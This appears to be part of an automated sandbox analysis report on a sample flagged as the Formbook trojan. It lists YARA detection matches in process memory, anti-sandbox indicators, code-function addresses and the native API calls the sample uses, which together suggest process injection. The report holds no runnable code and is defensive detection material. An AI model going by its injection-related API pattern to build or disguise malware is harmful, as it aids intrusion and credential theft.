            Source: Process Memory Space: FqJXaFxwEj.exe PID: 4460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: cmd.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 5616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: FqJXaFxwEj.exe PID: 4460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: cmd.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_02E34948
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_02E34938
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053506E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053528E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053566F8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053566EB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053506D9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_05352330
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_05352320
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_05356998
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_05356989
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeCode function: 7_2_011DC164
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeCode function: 7_2_011DE5B0
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeCode function: 7_2_011DE5A1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B22990
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1C1C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0F900
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD20A8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B090
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD28EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BDE824
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1002
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3EBB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2EB9A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B58BE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC03DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3ABD8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCDBD2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD2B28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC231B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B23360
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2AB40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BACB4F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD22AE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD32A9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCE2C5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBFA2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1D5E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD25DD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B00D20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD2D07
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B22D50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD1D55
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4496
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34CD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B22430
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1841F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCCC77
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCD466
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD1FF1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC67E2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BDDFCE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB1EB6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD2EF7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B306C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B26E30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCD616
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B25600
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09660
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B8AE60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004012A3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0042195E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00422343
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004223DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00422C0F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004044C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004044BE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0040B532
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0040B537
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004225D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0042159C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: String function: 01B95720 appears 85 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: String function: 01B5D08C appears 48 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: String function: 01B0B150 appears 177 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B499A0 NtCreateSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B499D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49910 NtAdjustPrivilegesToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B498A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B498F0 NtReadVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49840 NtDelayExecution,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49A20 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49A10 NtQuerySection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49A00 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49A50 NtCreateFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B495F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B495D0 NtClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49560 NtWriteFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49540 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B497A0 NtUnmapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49780 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49710 NtQueryInformationToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4A770 NtOpenThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49760 NtOpenProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B496D0 NtCreateKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E047 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E0C7 NtClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E177 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004012A3 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041DF97 NtCreateFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E042 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E0C1 NtClose,
